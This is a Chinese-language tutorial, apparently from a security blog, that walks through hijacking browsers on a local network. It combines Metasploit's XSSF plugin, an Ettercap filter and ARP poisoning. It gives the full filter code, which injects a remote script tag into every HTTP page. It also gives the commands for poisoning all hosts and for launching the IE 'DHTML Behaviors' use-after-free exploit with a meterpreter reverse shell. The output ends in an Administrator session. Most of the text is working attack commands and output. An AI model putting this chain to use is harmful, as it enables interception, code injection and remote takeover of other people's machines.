- 前言
- 生成你的xssf
- 生成你的Ettercap规则
- 编译执行 启动ARP
- 测试目标机访问
- 浏览器的脆弱利用
- 参考
http://brk.dis9.com/xssf-inject-with-ettercap-and-arp-poisoningclshack.html
前言
为了对付层出不穷的网络威胁,市场上出现了很多软件产品,专家们也给出了很多建议。尽管这些产品和建议使用户在上网浏览时会错误地产生安全感,但是却无法解决应用层的安全漏洞问题。Web浏览器集成在系统当中,需要依靠共享的基础组件工作,这种类似IE浏览器和Windows操作系统之间的关系加剧了浏览器的安全风险,其弱点很可能被不法分子加以利用。
Web技术缺乏多样性IE浏览器在桌面浏览器技术中已经占据统治地位。浏览器的同质化对于系统的兼容性也许是好事,但是对于网络安全却不是好事,浏览器的缺陷直接影响到数量巨大的用户。一旦不法分子利用浏览器中的安全漏洞实施攻击,由于多数企业网络的安全措施只有简单的用户名和密码,企业网络都将面临灭顶之灾,后果不堪想象。
单纯的攻击方式已经不在满足渗透者的需求 我们需要非主流
生成你的xssf
攻击方式最为灵活的xssf,我选择了包含攻击种类最多的Metasploit,参考1
msf > load xssf [-] Your Ruby version is 1.9.2. Make sure your version is up-to-date with the last non-vulnerable version before using XSSF! ____ ____ ______ ______ ________ |_ _||_ _|.' ____ \ .' ____ \ |_ __ | \ \ / / | (___ \_|| (___ \_| | |_ \_| > `' < _.____`. _.____`. | _| _/ /'`\ \_ | \____) || \____) | _| |_ |____||____| \______.' \______.'|_____| Cross-Site Scripting Framework 2.1 Ludovic Courgnaud - CONIX Security [+] Please use command 'xssf_urls' to see useful XSSF URLs [*] Successfully loaded plugin: xssf msf > xssf_urls [+] XSSF Server : 'http://222.219.171.92:8888/' or 'http://<PUBLIC-IP>:8888/' [+] Generic XSS injection: 'http://222.219.171.92:8888/loop' or 'http://<PUBLIC-IP>:8888/loop' [+] XSSF test page : 'http://222.219.171.92:8888/test.html' or 'http://<PUBLIC-IP>:8888/test.html' [+] XSSF Tunnel Proxy : 'localhost:8889' [+] XSSF logs page : 'http://localhost:8889/gui.html?guipage=main' [+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats' [+] XSSF help page : 'http://localhost:8889/gui.html?guipage=help' msf >
生成你的Ettercap规则
参考2 各位大牛别搞我IP。。
if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "</head>")) { replace("</head>", "</head><script src=\"http://222.219.171.92:8888/test.html\"></script> "); msg("Codice iniettatto...\n"); } if (search(DATA.data, "</HEAD>")) { replace("</HEAD>", "</HEAD><script src=\"http://222.219.171.92:8888/test.html\"></script> "); msg("Codice iniettatto...\n"); } }
编译执行 启动ARP
root@Dis9Team:/tmp# nano xss root@Dis9Team:/tmp# etterfilter xss -o xss.ef etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA 12 protocol tables loaded: DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth 11 constants loaded: VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP Parsing source file 'xss' done. Unfolding the meta-tree done. Converting labels to real offsets done. Writing output to 'xss.ef' done. -> Script encoded into 20 instructions. root@Dis9Team:/tmp# ettercap -T -q -i vmnet8 -F xss.ef -M ARP // // -P autoadd ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Content filters loaded from xss.ef... Listening on vmnet8... (Ethernet) vmnet8 -> 00:50:56:C0:00:08 5.5.5.1 255.255.255.0 SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 65534 GID 65534... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % 1 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help Activating autoadd plugin...
测试目标机访问
当目标浏览80端口的时候 并且网页中有元素,ETTERCAP就会劫持我数据 注入我们的XSS地址
浏览器的脆弱利用
更具你浏览器的版本 选择对应的EXPLOIT
msf > xssf_victims Victims ======= id xssf_server_id active ip interval browser_name browser_version cookie -- -------------- ------ -- -------- ------------ --------------- ------ 1 1 true 222.219.171.92 5 Internet Explorer 6.0 YES [*] Use xssf_information [VictimID] to see more information about a victim msf > xssf_information 1 INFORMATION ABOUT VICTIM 1 ============================ IP ADDRESS : 222.219.171.92 ACTIVE ? : TRUE FIRST REQUEST : 2012-03-07 16:39:56 UTC LAST REQUEST : 2012-03-07 16:40:06 UTC CONNECTION TIME : 0hr 0min 10sec BROWSER NAME : Internet Explorer BROWSER VERSION : 6.0 OS NAME : Windows OS VERSION : XP ARCHITECTURE : ARCH_X86 LOCATION : http://222.219.171.92:8888 XSSF COOKIE ? : YES RUNNING ATTACK : NONE WAITING ATTACKS : 0 msf >
从上面可以看出 目标是WINDOWS IE6
搜索IE6
msf > search ie6 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/xssf/public/old_browsers/bypass_sop_ie6 normal SOP Bypass exploit/windows/browser/adobe_flashplayer_avm 2011-03-15 good Adobe Flash Player AVM Bytecode Verification Vulnerability exploit/windows/browser/hp_loadrunner_addfile 2008-01-25 normal Persits XUpload ActiveX AddFile Buffer Overflow exploit/windows/browser/hp_loadrunner_addfolder 2007-12-25 good HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow exploit/windows/browser/ms06_013_createtextrange 2006-03-19 normal Internet Explorer createTextRange() Code Execution exploit/windows/browser/ms06_071_xml_core 2006-10-10 normal Internet Explorer XML Core Services HTTP Request Handling exploit/windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) exploit/windows/browser/ms09_043_owc_htmlurl 2009-08-11 normal Microsoft OWC Spreadsheet HTMLURL Buffer Overflow exploit/windows/browser/ms10_018_ie_behaviors 2010-03-09 good Internet Explorer DHTML Behaviors Use After Free exploit/windows/browser/nctaudiofile2_setformatlikesample 2007-01-24 normal NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow exploit/windows/browser/realplayer_qcp 2011-08-16 average RealNetworks Realplayer QCP Parsing Heap Overflow exploit/windows/browser/teechart_pro 2011-08-11 normal TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference exploit/windows/browser/viscom_movieplayer_drawtext 2010-01-12 normal Viscom Software Movie Player Pro SDK ActiveX 6.8 exploit/windows/fileformat/msworks_wkspictureinterface 2008-11-28 low Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution msf >
很多 选择一个Rank指为GOOD的吧
exploit/windows/browser/ms10_018_ie_behaviors 2010-03-09 good Internet Explorer DHTML Behaviors Use After Free
用这个
msf > use exploit/windows/browser/ms10_018_ie_behaviors msf exploit(ms10_018_ie_behaviors) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms10_018_ie_behaviors) > set LHOST 5.5.5.1 LHOST => 5.5.5.1 msf exploit(ms10_018_ie_behaviors) > exploit [*] Exploit running as background job. [*] Started reverse handler on 5.5.5.1:4444 [*] Using URL: http://0.0.0.0:8080/l13ec55pR44 [*] Local IP: http://222.219.171.92:8080/l13ec55pR44 msf exploit(ms10_018_ie_behaviors) > [*] Server started. msf exploit(ms10_018_ie_behaviors) > jobs Jobs ==== Id Name -- ---- 0 Exploit: windows/browser/ms10_018_ie_behaviors msf exploit(ms10_018_ie_behaviors) >
进行利用
msf exploit(ms10_018_ie_behaviors) > xssf_exploit 1 0 [*] Searching Metasploit launched module with JobID = '0'... [+] A running exploit exists: 'Exploit: windows/browser/ms10_018_ie_behaviors' [*] Exploit execution started, press [CTRL + C] to stop it ! [+] Remaining victims to attack: [1 (1)] [*] Sending Internet Explorer DHTML Behaviors Use After Free to 222.219.171.92:48378 (target: IE 6 SP0-SP2 (onclick))... [+] Code 'Exploit: windows/browser/ms10_018_ie_behaviors' sent to victim '1' [+] Remaining victims to attack: NONE [*] Sending Internet Explorer DHTML Behaviors Use After Free to 222.219.171.92:44503 (target: IE 6 SP0-SP2 (onclick))... [*] Sending stage (752128 bytes) to 5.5.5.129 [*] Meterpreter session 1 opened (5.5.5.1:4444 -> 5.5.5.129:1343) at 2012-03-07 16:45:18 +0800 [*] Session ID 1 (5.5.5.1:4444 -> 5.5.5.129:1343) processing InitialAutoRunScript 'migrate -f' [*] Current server process: iexplore.exe (3436) [*] Spawning notepad.exe process to migrate to [+] Migrating to 3332 [+] Successfully migrated to process msf exploit(ms10_018_ie_behaviors) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 DIS9TEAM-612ADE\Administrator @ DIS9TEAM-612ADE 5.5.5.1:4444 -> 5.5.5.129:1343 (5.5.5.129) msf exploit(ms10_018_ie_behaviors) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: DIS9TEAM-612ADE\Administrator meterpreter >
参考
1.http://brk.dis9.com/xss-attack-from-metasploit.html
2.http://brk.dis9.com/powerful-sniffing-tool-ettercap-the-using-the-tutorial-i-deceive-rules.html
3.http://brk.dis9.com/ettercap-filter-rules-send.html
4.http://brk.dis9.com/metasploit-and-beef-the-tutorial-chinese.html